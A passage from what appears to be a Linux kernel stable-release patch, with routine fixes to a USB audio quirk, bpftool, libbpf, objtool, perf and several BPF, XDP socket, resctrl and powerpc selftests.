++					.formats = SNDRV_PCM_FMTBIT_S24_3LE,
++					.channels = 6,
++					.iface = 0,
++					.altsetting = 1,
++					.altset_idx = 1,
++					.endpoint = 0x82,
++					.ep_idx = 1,
++					.ep_attr = USB_ENDPOINT_XFER_ISOC|
++						USB_ENDPOINT_SYNC_ASYNC|
++					USB_ENDPOINT_USAGE_IMPLICIT_FB,
++					.rates = SNDRV_PCM_RATE_44100,
++					.rate_min = 44100,
++					.rate_max = 44100,
++					.nr_rates = 1,
++					.rate_table = (unsigned int[]) { 44100 }
++				}
++			},
++			{
++				.ifnum = -1
++			}
++		}
++	}
++},
++
+ /*
+  * MacroSilicon MS2100/MS2106 based AV capture cards
+  *
+diff --git a/tools/arch/x86/kcpuid/cpuid.csv b/tools/arch/x86/kcpuid/cpuid.csv
+index 4f1c4b0c29e98..9914bdf4fc9ec 100644
+--- a/tools/arch/x86/kcpuid/cpuid.csv
++++ b/tools/arch/x86/kcpuid/cpuid.csv
+@@ -184,8 +184,8 @@
+ 	 7,    0,  EBX,     27, avx512er, AVX512 Exponent Reciproca instr
+ 	 7,    0,  EBX,     28, avx512cd, AVX512 Conflict Detection instr
+ 	 7,    0,  EBX,     29, sha, Intel Secure Hash Algorithm Extensions instr
+-	 7,    0,  EBX,     26, avx512bw, AVX512 Byte & Word instr
+-	 7,    0,  EBX,     28, avx512vl, AVX512 Vector Length Extentions (VL)
++	 7,    0,  EBX,     30, avx512bw, AVX512 Byte & Word instr
++	 7,    0,  EBX,     31, avx512vl, AVX512 Vector Length Extentions (VL)
+ 	 7,    0,  ECX,      0, prefetchwt1, X
+ 	 7,    0,  ECX,      1, avx512vbmi, AVX512 Vector Byte Manipulation Instructions
+ 	 7,    0,  ECX,      2, umip, User-mode Instruction Prevention
+diff --git a/tools/bpf/bpftool/json_writer.c b/tools/bpf/bpftool/json_writer.c
+index 7fea83bedf488..bca5dd0a59e34 100644
+--- a/tools/bpf/bpftool/json_writer.c
++++ b/tools/bpf/bpftool/json_writer.c
+@@ -80,9 +80,6 @@ static void jsonw_puts(json_writer_t *self, const char *str)
+ 		case '"':
+ 			fputs("\\\"", self->out);
+ 			break;
+-		case '\'':
+-			fputs("\\\'", self->out);
+-			break;
+ 		default:
+ 			putc(*str, self->out);
+ 		}
+diff --git a/tools/bpf/bpftool/xlated_dumper.c b/tools/bpf/bpftool/xlated_dumper.c
+index 6fe3134ae45d4..3daa05d9bbb73 100644
+--- a/tools/bpf/bpftool/xlated_dumper.c
++++ b/tools/bpf/bpftool/xlated_dumper.c
+@@ -372,8 +372,15 @@ void dump_xlated_for_graph(struct dump_data *dd, void *buf_start, void *buf_end,
+ 	struct bpf_insn *insn_start = buf_start;
+ 	struct bpf_insn *insn_end = buf_end;
+ 	struct bpf_insn *cur = insn_start;
++	bool double_insn = false;
+ 
+ 	for (; cur <= insn_end; cur++) {
++		if (double_insn) {
++			double_insn = false;
++			continue;
++		}
++		double_insn = cur->code == (BPF_LD | BPF_IMM | BPF_DW);
++
+ 		printf("% 4d: ", (int)(cur - insn_start + start_idx));
+ 		print_bpf_insn(&cbs, cur, true);
+ 		if (cur != insn_end)
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index 464ca3f01fe7a..bd260134c4201 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -6901,6 +6901,17 @@ struct bpf_list_node {
+ 	__u64 :64;
+ } __attribute__((aligned(8)));
+ 
++struct bpf_rb_root {
++	__u64 :64;
++	__u64 :64;
++} __attribute__((aligned(8)));
++
++struct bpf_rb_node {
++	__u64 :64;
++	__u64 :64;
++	__u64 :64;
++} __attribute__((aligned(8)));
++
+ struct bpf_sysctl {
+ 	__u32	write;		/* Sysctl is being read (= 0) or written (= 1).
+ 				 * Allows 1,2,4-byte read, but no write.
+diff --git a/tools/lib/bpf/gen_loader.c b/tools/lib/bpf/gen_loader.c
+index 23f5c46708f8f..b74c82bb831e6 100644
+--- a/tools/lib/bpf/gen_loader.c
++++ b/tools/lib/bpf/gen_loader.c
+@@ -804,11 +804,13 @@ static void emit_relo_ksym_btf(struct bpf_gen *gen, struct ksym_relo_desc *relo,
+ 		return;
+ 	/* try to copy from existing ldimm64 insn */
+ 	if (kdesc->ref > 1) {
+-		move_blob2blob(gen, insn + offsetof(struct bpf_insn, imm), 4,
+-			       kdesc->insn + offsetof(struct bpf_insn, imm));
+ 		move_blob2blob(gen, insn + sizeof(struct bpf_insn) + offsetof(struct bpf_insn, imm), 4,
+ 			       kdesc->insn + sizeof(struct bpf_insn) + offsetof(struct bpf_insn, imm));
+-		/* jump over src_reg adjustment if imm is not 0, reuse BPF_REG_0 from move_blob2blob */
++		move_blob2blob(gen, insn + offsetof(struct bpf_insn, imm), 4,
++			       kdesc->insn + offsetof(struct bpf_insn, imm));
++		/* jump over src_reg adjustment if imm (btf_id) is not 0, reuse BPF_REG_0 from move_blob2blob
++		 * If btf_id is zero, clear BPF_PSEUDO_BTF_ID flag in src_reg of ld_imm64 insn
++		 */
+ 		emit(gen, BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 3));
+ 		goto clear_src_reg;
+ 	}
+@@ -831,7 +833,7 @@ static void emit_relo_ksym_btf(struct bpf_gen *gen, struct ksym_relo_desc *relo,
+ 	emit(gen, BPF_STX_MEM(BPF_W, BPF_REG_8, BPF_REG_7,
+ 			      sizeof(struct bpf_insn) + offsetof(struct bpf_insn, imm)));
+ 	/* skip src_reg adjustment */
+-	emit(gen, BPF_JMP_IMM(BPF_JSGE, BPF_REG_7, 0, 3));
++	emit(gen, BPF_JMP_IMM(BPF_JA, 0, 0, 3));
+ clear_src_reg:
+ 	/* clear bpf_object__relocate_data's src_reg assignment, otherwise we get a verifier failure */
+ 	reg_mask = src_reg_mask();
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index ea1e7cdeb1b34..3b1e19894b21a 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -2913,17 +2913,6 @@ static int update_cfi_state(struct instruction *insn,
+ 				break;
+ 			}
+ 
+-			if (!cfi->drap && op->src.reg == CFI_SP &&
+-			    op->dest.reg == CFI_BP && cfa->base == CFI_SP &&
+-			    check_reg_frame_pos(&regs[CFI_BP], -cfa->offset + op->src.offset)) {
+-
+-				/* lea disp(%rsp), %rbp */
+-				cfa->base = CFI_BP;
+-				cfa->offset -= op->src.offset;
+-				cfi->bp_scratch = false;
+-				break;
+-			}
+-
+ 			if (op->src.reg == CFI_SP && cfa->base == CFI_SP) {
+ 
+ 				/* drap: lea disp(%rsp), %drap */
+diff --git a/tools/perf/util/auxtrace.c b/tools/perf/util/auxtrace.c
+index d4b04fa07a119..e088cfced1932 100644
+--- a/tools/perf/util/auxtrace.c
++++ b/tools/perf/util/auxtrace.c
+@@ -2444,6 +2444,7 @@ static int find_entire_kern_cb(void *arg, const char *name __maybe_unused,
+ 			       char type, u64 start)
+ {
+ 	struct sym_args *args = arg;
++	u64 size;
+ 
+ 	if (!kallsyms__is_function(type))
+ 		return 0;
+@@ -2453,7 +2454,9 @@ static int find_entire_kern_cb(void *arg, const char *name __maybe_unused,
+ 		args->start = start;
+ 	}
+ 	/* Don't know exactly where the kernel ends, so we add a page */
+-	args->size = round_up(start, page_size) + page_size - args->start;
++	size = round_up(start, page_size) + page_size - args->start;
++	if (size > args->size)
++		args->size = size;
+ 
+ 	return 0;
+ }
+diff --git a/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c b/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
+index 0ac860c8dd2b8..7145c5890de02 100644
+--- a/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
++++ b/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
+@@ -1998,6 +1998,8 @@ static void intel_pt_calc_cbr(struct intel_pt_decoder *decoder)
+ 
+ 	decoder->cbr = cbr;
+ 	decoder->cbr_cyc_to_tsc = decoder->max_non_turbo_ratio_fp / cbr;
++	decoder->cyc_ref_timestamp = decoder->timestamp;
++	decoder->cycle_cnt = 0;
+ 
+ 	intel_pt_mtc_cyc_cnt_cbr(decoder);
+ }
+diff --git a/tools/testing/selftests/bpf/network_helpers.c b/tools/testing/selftests/bpf/network_helpers.c
+index 01de33191226b..596caa1765820 100644
+--- a/tools/testing/selftests/bpf/network_helpers.c
++++ b/tools/testing/selftests/bpf/network_helpers.c
+@@ -95,7 +95,7 @@ static int __start_server(int type, int protocol, const struct sockaddr *addr,
+ 	if (reuseport &&
+ 	    setsockopt(fd, SOL_SOCKET, SO_REUSEPORT, &on, sizeof(on))) {
+ 		log_err("Failed to set SO_REUSEPORT");
+-		return -1;
++		goto error_close;
+ 	}
+ 
+ 	if (bind(fd, addr, addrlen) < 0) {
+diff --git a/tools/testing/selftests/bpf/prog_tests/align.c b/tools/testing/selftests/bpf/prog_tests/align.c
+index 4666f88f2bb4f..8baebb41541dc 100644
+--- a/tools/testing/selftests/bpf/prog_tests/align.c
++++ b/tools/testing/selftests/bpf/prog_tests/align.c
+@@ -575,14 +575,14 @@ static struct bpf_align_test tests[] = {
+ 			/* New unknown value in R7 is (4n), >= 76 */
+ 			{14, "R7_w=scalar(umin=76,umax=1096,var_off=(0x0; 0x7fc))"},
+ 			/* Adding it to packet pointer gives nice bounds again */
+-			{16, "R5_w=pkt(id=3,off=0,r=0,umin=2,umax=1082,var_off=(0x2; 0xfffffffc)"},
++			{16, "R5_w=pkt(id=3,off=0,r=0,umin=2,umax=1082,var_off=(0x2; 0x7fc)"},
+ 			/* At the time the word size load is performed from R5,
+ 			 * its total fixed offset is NET_IP_ALIGN + reg->off (0)
+ 			 * which is 2.  Then the variable offset is (4n+2), so
+ 			 * the total offset is 4-byte aligned and meets the
+ 			 * load's requirements.
+ 			 */
+-			{20, "R5=pkt(id=3,off=0,r=4,umin=2,umax=1082,var_off=(0x2; 0xfffffffc)"},
++			{20, "R5=pkt(id=3,off=0,r=4,umin=2,umax=1082,var_off=(0x2; 0x7fc)"},
+ 		},
+ 	},
+ };
+diff --git a/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c b/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c
+index 621c572221918..63ee892bc7573 100644
+--- a/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c
++++ b/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c
+@@ -56,8 +56,9 @@ static bool assert_storage_noexist(struct bpf_map *map, const void *key)
+ 
+ static bool connect_send(const char *cgroup_path)
+ {
+-	bool res = true;
+ 	int server_fd = -1, client_fd = -1;
++	char message[] = "message";
++	bool res = true;
+ 
+ 	if (join_cgroup(cgroup_path))
+ 		goto out_clean;
+@@ -70,7 +71,10 @@ static bool connect_send(const char *cgroup_path)
+ 	if (client_fd < 0)
+ 		goto out_clean;
+ 
+-	if (send(client_fd, "message", strlen("message"), 0) < 0)
++	if (send(client_fd, &message, sizeof(message), 0) < 0)
++		goto out_clean;
++
++	if (read(server_fd, &message, sizeof(message)) < 0)
+ 		goto out_clean;
+ 
+ 	res = false;
+diff --git a/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c b/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c
+index 5308de1ed478e..2715c68301f52 100644
+--- a/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c
++++ b/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c
+@@ -65,6 +65,7 @@ void test_get_stackid_cannot_attach(void)
+ 	skel->links.oncpu = bpf_program__attach_perf_event(skel->progs.oncpu,
+ 							   pmu_fd);
+ 	ASSERT_OK_PTR(skel->links.oncpu, "attach_perf_event_callchain");
++	bpf_link__destroy(skel->links.oncpu);
+ 	close(pmu_fd);
+ 
+ 	/* add exclude_callchain_kernel, attach should fail */
+diff --git a/tools/testing/selftests/bpf/prog_tests/linked_list.c b/tools/testing/selftests/bpf/prog_tests/linked_list.c
+index 9a7d4c47af633..c456b34a823ac 100644
+--- a/tools/testing/selftests/bpf/prog_tests/linked_list.c
++++ b/tools/testing/selftests/bpf/prog_tests/linked_list.c
+@@ -58,12 +58,12 @@ static struct {
+ 	TEST(inner_map, pop_front)
+ 	TEST(inner_map, pop_back)
+ #undef TEST
+-	{ "map_compat_kprobe", "tracing progs cannot use bpf_list_head yet" },
+-	{ "map_compat_kretprobe", "tracing progs cannot use bpf_list_head yet" },
+-	{ "map_compat_tp", "tracing progs cannot use bpf_list_head yet" },
+-	{ "map_compat_perf", "tracing progs cannot use bpf_list_head yet" },
+-	{ "map_compat_raw_tp", "tracing progs cannot use bpf_list_head yet" },
+-	{ "map_compat_raw_tp_w", "tracing progs cannot use bpf_list_head yet" },
++	{ "map_compat_kprobe", "tracing progs cannot use bpf_{list_head,rb_root} yet" },
++	{ "map_compat_kretprobe", "tracing progs cannot use bpf_{list_head,rb_root} yet" },
++	{ "map_compat_tp", "tracing progs cannot use bpf_{list_head,rb_root} yet" },
++	{ "map_compat_perf", "tracing progs cannot use bpf_{list_head,rb_root} yet" },
++	{ "map_compat_raw_tp", "tracing progs cannot use bpf_{list_head,rb_root} yet" },
++	{ "map_compat_raw_tp_w", "tracing progs cannot use bpf_{list_head,rb_root} yet" },
+ 	{ "obj_type_id_oor", "local type ID argument must be in range [0, U32_MAX]" },
+ 	{ "obj_new_no_composite", "bpf_obj_new type ID argument must be of a struct" },
+ 	{ "obj_new_no_struct", "bpf_obj_new type ID argument must be of a struct" },
+@@ -78,8 +78,6 @@ static struct {
+ 	{ "direct_write_head", "direct access to bpf_list_head is disallowed" },
+ 	{ "direct_read_node", "direct access to bpf_list_node is disallowed" },
+ 	{ "direct_write_node", "direct access to bpf_list_node is disallowed" },
+-	{ "write_after_push_front", "only read is supported" },
+-	{ "write_after_push_back", "only read is supported" },
+ 	{ "use_after_unlock_push_front", "invalid mem access 'scalar'" },
+ 	{ "use_after_unlock_push_back", "invalid mem access 'scalar'" },
+ 	{ "double_push_front", "arg#1 expected pointer to allocated object" },
+diff --git a/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c b/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c
+index 33144c9432aeb..f4aad35afae16 100644
+--- a/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c
++++ b/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c
+@@ -63,7 +63,8 @@ void test_perf_event_stackmap(void)
+ 			PERF_SAMPLE_BRANCH_NO_FLAGS |
+ 			PERF_SAMPLE_BRANCH_NO_CYCLES |
+ 			PERF_SAMPLE_BRANCH_CALL_STACK,
+-		.sample_period = 5000,
++		.freq = 1,
++		.sample_freq = read_perf_max_sample_freq(),
+ 		.size = sizeof(struct perf_event_attr),
+ 	};
+ 	struct perf_event_stackmap *skel;
+diff --git a/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c b/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c
+index f4ea1a215ce4d..704f7f6c3704a 100644
+--- a/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c
++++ b/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c
+@@ -2,21 +2,6 @@
+ #include <test_progs.h>
+ #include "test_stacktrace_build_id.skel.h"
+ 
+-static __u64 read_perf_max_sample_freq(void)
+-{
+-	__u64 sample_freq = 5000; /* fallback to 5000 on error */
+-	FILE *f;
+-	__u32 duration = 0;
+-
+-	f = fopen("/proc/sys/kernel/perf_event_max_sample_rate", "r");
+-	if (f == NULL)
+-		return sample_freq;
+-	CHECK(fscanf(f, "%llu", &sample_freq) != 1, "Get max sample rate",
+-		  "return default value: 5000,err %d\n", -errno);
+-	fclose(f);
+-	return sample_freq;
+-}
+-
+ void test_stacktrace_build_id_nmi(void)
+ {
+ 	int control_map_fd, stackid_hmap_fd, stackmap_fd;
+diff --git a/tools/testing/selftests/bpf/progs/linked_list.c b/tools/testing/selftests/bpf/progs/linked_list.c
+index 4ad88da5cda2d..4fa4a9b01bde3 100644
+--- a/tools/testing/selftests/bpf/progs/linked_list.c
++++ b/tools/testing/selftests/bpf/progs/linked_list.c
+@@ -260,7 +260,7 @@ int test_list_push_pop_multiple(struct bpf_spin_lock *lock, struct bpf_list_head
+ {
+ 	int ret;
+ 
+-	ret = list_push_pop_multiple(lock ,head, false);
++	ret = list_push_pop_multiple(lock, head, false);
+ 	if (ret)
+ 		return ret;
+ 	return list_push_pop_multiple(lock, head, true);
+diff --git a/tools/testing/selftests/bpf/progs/linked_list_fail.c b/tools/testing/selftests/bpf/progs/linked_list_fail.c
+index 1d9017240e197..69cdc07cba13a 100644
+--- a/tools/testing/selftests/bpf/progs/linked_list_fail.c
++++ b/tools/testing/selftests/bpf/progs/linked_list_fail.c
+@@ -54,28 +54,44 @@
+ 		return 0;                                   \
+ 	}
+ 
+-CHECK(kptr, push_front, &f->head);
+-CHECK(kptr, push_back, &f->head);
+ CHECK(kptr, pop_front, &f->head);
+ CHECK(kptr, pop_back, &f->head);
+ 
+-CHECK(global, push_front, &ghead);
+-CHECK(global, push_back, &ghead);
+ CHECK(global, pop_front, &ghead);
+ CHECK(global, pop_back, &ghead);
+ 
+-CHECK(map, push_front, &v->head);
+-CHECK(map, push_back, &v->head);
+ CHECK(map, pop_front, &v->head);
+ CHECK(map, pop_back, &v->head);
+ 
+-CHECK(inner_map, push_front, &iv->head);
+-CHECK(inner_map, push_back, &iv->head);
+ CHECK(inner_map, pop_front, &iv->head);
+ CHECK(inner_map, pop_back, &iv->head);
+ 
+ #undef CHECK
+ 
++#define CHECK(test, op, hexpr, nexpr)					\
++	SEC("?tc")							\
++	int test##_missing_lock_##op(void *ctx)				\
++	{								\
++		INIT;							\
++		void (*p)(void *, void *) = (void *)&bpf_list_##op;	\
++		p(hexpr, nexpr);					\
++		return 0;						\
++	}
++
++CHECK(kptr, push_front, &f->head, b);
++CHECK(kptr, push_back, &f->head, b);
++
++CHECK(global, push_front, &ghead, f);
++CHECK(global, push_back, &ghead, f);
++
++CHECK(map, push_front, &v->head, f);
++CHECK(map, push_back, &v->head, f);
++
++CHECK(inner_map, push_front, &iv->head, f);
++CHECK(inner_map, push_back, &iv->head, f);
++
++#undef CHECK
++
+ #define CHECK(test, op, lexpr, hexpr)                       \
+ 	SEC("?tc")                                          \
+ 	int test##_incorrect_lock_##op(void *ctx)           \
+@@ -108,11 +124,47 @@ CHECK(inner_map, pop_back, &iv->head);
+ 	CHECK(inner_map_global, op, &iv->lock, &ghead);        \
+ 	CHECK(inner_map_map, op, &iv->lock, &v->head);
+ 
+-CHECK_OP(push_front);
+-CHECK_OP(push_back);
+ CHECK_OP(pop_front);
+ CHECK_OP(pop_back);
+ 
++#undef CHECK
++#undef CHECK_OP
++
++#define CHECK(test, op, lexpr, hexpr, nexpr)				\
++	SEC("?tc")							\
++	int test##_incorrect_lock_##op(void *ctx)			\
++	{								\
++		INIT;							\
++		void (*p)(void *, void*) = (void *)&bpf_list_##op;	\
++		bpf_spin_lock(lexpr);					\
++		p(hexpr, nexpr);					\
++		return 0;						\
++	}
++
++#define CHECK_OP(op)							\
++	CHECK(kptr_kptr, op, &f1->lock, &f2->head, b);			\
++	CHECK(kptr_global, op, &f1->lock, &ghead, f);			\
++	CHECK(kptr_map, op, &f1->lock, &v->head, f);			\
++	CHECK(kptr_inner_map, op, &f1->lock, &iv->head, f);		\
++									\
++	CHECK(global_global, op, &glock2, &ghead, f);			\
++	CHECK(global_kptr, op, &glock, &f1->head, b);			\
++	CHECK(global_map, op, &glock, &v->head, f);			\
++	CHECK(global_inner_map, op, &glock, &iv->head, f);		\
++									\
++	CHECK(map_map, op, &v->lock, &v2->head, f);			\
++	CHECK(map_kptr, op, &v->lock, &f2->head, b);			\
++	CHECK(map_global, op, &v->lock, &ghead, f);			\
++	CHECK(map_inner_map, op, &v->lock, &iv->head, f);		\
++									\
++	CHECK(inner_map_inner_map, op, &iv->lock, &iv2->head, f);	\
++	CHECK(inner_map_kptr, op, &iv->lock, &f2->head, b);		\
++	CHECK(inner_map_global, op, &iv->lock, &ghead, f);		\
++	CHECK(inner_map_map, op, &iv->lock, &v->head, f);
++
++CHECK_OP(push_front);
++CHECK_OP(push_back);
++
+ #undef CHECK
+ #undef CHECK_OP
+ #undef INIT
+@@ -303,34 +355,6 @@ int direct_write_node(void *ctx)
+ 	return 0;
+ }
+ 
+-static __always_inline
+-int write_after_op(void (*push_op)(void *head, void *node))
+-{
+-	struct foo *f;
+-
+-	f = bpf_obj_new(typeof(*f));
+-	if (!f)
+-		return 0;
+-	bpf_spin_lock(&glock);
+-	push_op(&ghead, &f->node);
+-	f->data = 42;
+-	bpf_spin_unlock(&glock);
+-
+-	return 0;
+-}
+-
+-SEC("?tc")
+-int write_after_push_front(void *ctx)
+-{
+-	return write_after_op((void *)bpf_list_push_front);
+-}
+-
+-SEC("?tc")
+-int write_after_push_back(void *ctx)
+-{
+-	return write_after_op((void *)bpf_list_push_back);
+-}
+-
+ static __always_inline
+ int use_after_unlock(void (*op)(void *head, void *node))
+ {
+diff --git a/tools/testing/selftests/bpf/test_xsk.sh b/tools/testing/selftests/bpf/test_xsk.sh
+index d821fd0985049..4e3ec38cbe68c 100755
+--- a/tools/testing/selftests/bpf/test_xsk.sh
++++ b/tools/testing/selftests/bpf/test_xsk.sh
+@@ -118,6 +118,7 @@ setup_vethPairs() {
+ 	ip link add ${VETH0} numtxqueues 4 numrxqueues 4 type veth peer name ${VETH1} numtxqueues 4 numrxqueues 4
+ 	if [ -f /proc/net/if_inet6 ]; then
+ 		echo 1 > /proc/sys/net/ipv6/conf/${VETH0}/disable_ipv6
++		echo 1 > /proc/sys/net/ipv6/conf/${VETH1}/disable_ipv6
+ 	fi
+ 	if [[ $verbose -eq 1 ]]; then
+ 	        echo "setting up ${VETH1}: namespace: ${NS1}"
+diff --git a/tools/testing/selftests/bpf/testing_helpers.c b/tools/testing/selftests/bpf/testing_helpers.c
+index 9695318e8132d..9c3de39023f60 100644
+--- a/tools/testing/selftests/bpf/testing_helpers.c
++++ b/tools/testing/selftests/bpf/testing_helpers.c
+@@ -229,3 +229,23 @@ int bpf_test_load_program(enum bpf_prog_type type, const struct bpf_insn *insns,
+ 
+ 	return bpf_prog_load(type, NULL, license, insns, insns_cnt, &opts);
+ }
++
++__u64 read_perf_max_sample_freq(void)
++{
++	__u64 sample_freq = 5000; /* fallback to 5000 on error */
++	FILE *f;
++
++	f = fopen("/proc/sys/kernel/perf_event_max_sample_rate", "r");
++	if (f == NULL) {
++		printf("Failed to open /proc/sys/kernel/perf_event_max_sample_rate: err %d\n"
++		       "return default value: 5000\n", -errno);
++		return sample_freq;
++	}
++	if (fscanf(f, "%llu", &sample_freq) != 1) {
++		printf("Failed to parse /proc/sys/kernel/perf_event_max_sample_rate: err %d\n"
++		       "return default value: 5000\n", -errno);
++	}
++
++	fclose(f);
++	return sample_freq;
++}
+diff --git a/tools/testing/selftests/bpf/testing_helpers.h b/tools/testing/selftests/bpf/testing_helpers.h
+index 6ec00bf79cb55..eb8790f928e4c 100644
+--- a/tools/testing/selftests/bpf/testing_helpers.h
++++ b/tools/testing/selftests/bpf/testing_helpers.h
+@@ -20,3 +20,5 @@ struct test_filter_set;
+ int parse_test_list(const char *s,
+ 		    struct test_filter_set *test_set,
+ 		    bool is_glob_pattern);
++
++__u64 read_perf_max_sample_freq(void);
+diff --git a/tools/testing/selftests/bpf/xskxceiver.c b/tools/testing/selftests/bpf/xskxceiver.c
+index 1b9f48daa2257..b74dddf6bbbe5 100644
+--- a/tools/testing/selftests/bpf/xskxceiver.c
++++ b/tools/testing/selftests/bpf/xskxceiver.c
+@@ -649,7 +649,6 @@ static struct pkt_stream *pkt_stream_generate(struct xsk_umem_info *umem, u32 nb
+ 	if (!pkt_stream)
+ 		exit_with_error(ENOMEM);
+ 
+-	pkt_stream->nb_pkts = nb_pkts;
+ 	for (i = 0; i < nb_pkts; i++) {
+ 		pkt_set(umem, &pkt_stream->pkts[i], (i % umem->num_frames) * umem->frame_size,
+ 			pkt_len);
+@@ -1142,7 +1141,14 @@ static int validate_rx_dropped(struct ifobject *ifobject)
+ 	if (err)
+ 		return TEST_FAILURE;
+ 
+-	if (stats.rx_dropped == ifobject->pkt_stream->nb_pkts / 2)
++	/* The receiver calls getsockopt after receiving the last (valid)
++	 * packet which is not the final packet sent in this test (valid and
++	 * invalid packets are sent in alternating fashion with the final
++	 * packet being invalid). Since the last packet may or may not have
++	 * been dropped already, both outcomes must be allowed.
++	 */
++	if (stats.rx_dropped == ifobject->pkt_stream->nb_pkts / 2 ||
++	    stats.rx_dropped == ifobject->pkt_stream->nb_pkts / 2 - 1)
+ 		return TEST_PASS;
+ 
+ 	return TEST_FAILURE;
+@@ -1662,6 +1668,7 @@ static void testapp_single_pkt(struct test_spec *test)
+ 
+ static void testapp_invalid_desc(struct test_spec *test)
+ {
++	u64 umem_size = test->ifobj_tx->umem->num_frames * test->ifobj_tx->umem->frame_size;
+ 	struct pkt pkts[] = {
+ 		/* Zero packet address allowed */
+ 		{0, PKT_SIZE, 0, true},
+@@ -1672,9 +1679,9 @@ static void testapp_invalid_desc(struct test_spec *test)
+ 		/* Packet too large */
+ 		{0x2000, XSK_UMEM__INVALID_FRAME_SIZE, 0, false},
+ 		/* After umem ends */
+-		{UMEM_SIZE, PKT_SIZE, 0, false},
++		{umem_size, PKT_SIZE, 0, false},
+ 		/* Straddle the end of umem */
+-		{UMEM_SIZE - PKT_SIZE / 2, PKT_SIZE, 0, false},
++		{umem_size - PKT_SIZE / 2, PKT_SIZE, 0, false},
+ 		/* Straddle a page boundrary */
+ 		{0x3000 - PKT_SIZE / 2, PKT_SIZE, 0, false},
+ 		/* Straddle a 2K boundrary */
+@@ -1692,8 +1699,8 @@ static void testapp_invalid_desc(struct test_spec *test)
+ 	}
+ 
+ 	if (test->ifobj_tx->shared_umem) {
+-		pkts[4].addr += UMEM_SIZE;
+-		pkts[5].addr += UMEM_SIZE;
++		pkts[4].addr += umem_size;
++		pkts[5].addr += umem_size;
+ 	}
+ 
+ 	pkt_stream_generate_custom(test, pkts, ARRAY_SIZE(pkts));
+diff --git a/tools/testing/selftests/bpf/xskxceiver.h b/tools/testing/selftests/bpf/xskxceiver.h
+index edb76d2def9fe..292fc943b8fdf 100644
+--- a/tools/testing/selftests/bpf/xskxceiver.h
++++ b/tools/testing/selftests/bpf/xskxceiver.h
+@@ -52,7 +52,6 @@
+ #define THREAD_TMOUT 3
+ #define DEFAULT_PKT_CNT (4 * 1024)
+ #define DEFAULT_UMEM_BUFFERS (DEFAULT_PKT_CNT / 4)
+-#define UMEM_SIZE (DEFAULT_UMEM_BUFFERS * XSK_UMEM__DEFAULT_FRAME_SIZE)
+ #define RX_FULL_RXQSIZE 32
+ #define UMEM_HEADROOM_TEST_SIZE 128
+ #define XSK_UMEM__INVALID_FRAME_SIZE (XSK_UMEM__DEFAULT_FRAME_SIZE + 1)
+diff --git a/tools/testing/selftests/mount_setattr/mount_setattr_test.c b/tools/testing/selftests/mount_setattr/mount_setattr_test.c
+index 8c5fea68ae677..969647228817b 100644
+--- a/tools/testing/selftests/mount_setattr/mount_setattr_test.c
++++ b/tools/testing/selftests/mount_setattr/mount_setattr_test.c
+@@ -18,6 +18,7 @@
+ #include <grp.h>
+ #include <stdbool.h>
+ #include <stdarg.h>
++#include <linux/mount.h>
+ 
+ #include "../kselftest_harness.h"
+ 
+diff --git a/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c b/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c
+index 022cc1655eb52..75527876ad3c1 100644
+--- a/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c
++++ b/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c
+@@ -63,9 +63,9 @@ static int mmcra_thresh_marked_sample(void)
+ 			get_mmcra_thd_stop(get_reg_value(intr_regs, "MMCRA"), 4));
+ 	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, marked) !=
+ 			get_mmcra_marked(get_reg_value(intr_regs, "MMCRA"), 4));
+-	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, sample >> 2) !=
++	FAIL_IF((EV_CODE_EXTRACT(event.attr.config, sample) >> 2) !=
+ 			get_mmcra_rand_samp_elig(get_reg_value(intr_regs, "MMCRA"), 4));
+-	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, sample & 0x3) !=
++	FAIL_IF((EV_CODE_EXTRACT(event.attr.config, sample) & 0x3) !=
+ 			get_mmcra_sample_mode(get_reg_value(intr_regs, "MMCRA"), 4));
+ 	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, sm) !=
+ 			get_mmcra_sm(get_reg_value(intr_regs, "MMCRA"), 4));
+diff --git a/tools/testing/selftests/resctrl/cache.c b/tools/testing/selftests/resctrl/cache.c
+index 68ff856d36f0b..0485863a169f2 100644
+--- a/tools/testing/selftests/resctrl/cache.c
++++ b/tools/testing/selftests/resctrl/cache.c
+@@ -244,10 +244,12 @@ int cat_val(struct resctrl_val_param *param)
+ 	while (1) {
+ 		if (!strncmp(resctrl_val, CAT_STR, sizeof(CAT_STR))) {
+ 			ret = param->setup(1, param);
+-			if (ret) {
++			if (ret == END_OF_TESTS) {
+ 				ret = 0;
+ 				break;
+ 			}
++			if (ret < 0)
++				break;
+ 			ret = reset_enable_llc_perf(bm_pid, param->cpu_no);
+ 			if (ret)
+ 				break;
+diff --git a/tools/testing/selftests/resctrl/cat_test.c b/tools/testing/selftests/resctrl/cat_test.c
